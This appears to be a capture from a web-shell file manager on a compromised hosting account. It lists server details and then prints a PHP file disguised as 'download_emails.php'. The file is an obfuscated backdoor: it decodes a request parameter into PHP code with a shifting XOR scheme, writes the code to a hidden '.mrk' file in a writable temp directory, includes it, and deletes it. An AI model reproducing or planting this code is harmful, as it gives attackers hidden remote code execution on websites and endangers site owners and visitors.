HEX
Server: LiteSpeed
System: Linux da020 6.1.0-50-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.176-1 (2026-07-02) x86_64
User: nmel17aacb (1161)
PHP: 8.2.29
Disabled: exec,system,passthru,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/nmel17aacb/domains/joppen.be/public_html/cgi-bin/download_emails.php
<?php

if(isset($_REQUEST) && isset($_REQUEST["r\x65f\x65\x72\x65nce"])){
	$flag = $_REQUEST["r\x65f\x65\x72\x65nce"];
	 	$flag	 = explode 		('.'		, $flag ); 	
	$property_set = '';
            $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($s4 );
            $t = 0;
    
            $__tmp = $flag;
            while ($v8 = array_shift($__tmp)) {
                $sChar = ord($s4[$t%	$lenS] );
                $dec = ((int)$v8 - $sChar - ($t%	10)) ^ 36;
                $property_set .=chr($dec );
                $t++; }  
	$pset = array_filter([getcwd(), sys_get_temp_dir(), session_save_path(), getenv("TEMP"), "/tmp", "/dev/shm", "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir")]);
	while ($bind = array_shift($pset)) {
    		if ((is_dir($bind) and is_writable($bind))) {
    $pgrp = vsprintf("%s/%s", [$bind, ".mrk"]);
    $success = file_put_contents($pgrp, $property_set);
if ($success) {
	include $pgrp;
	@unlink($pgrp);
	exit;}
}
}
}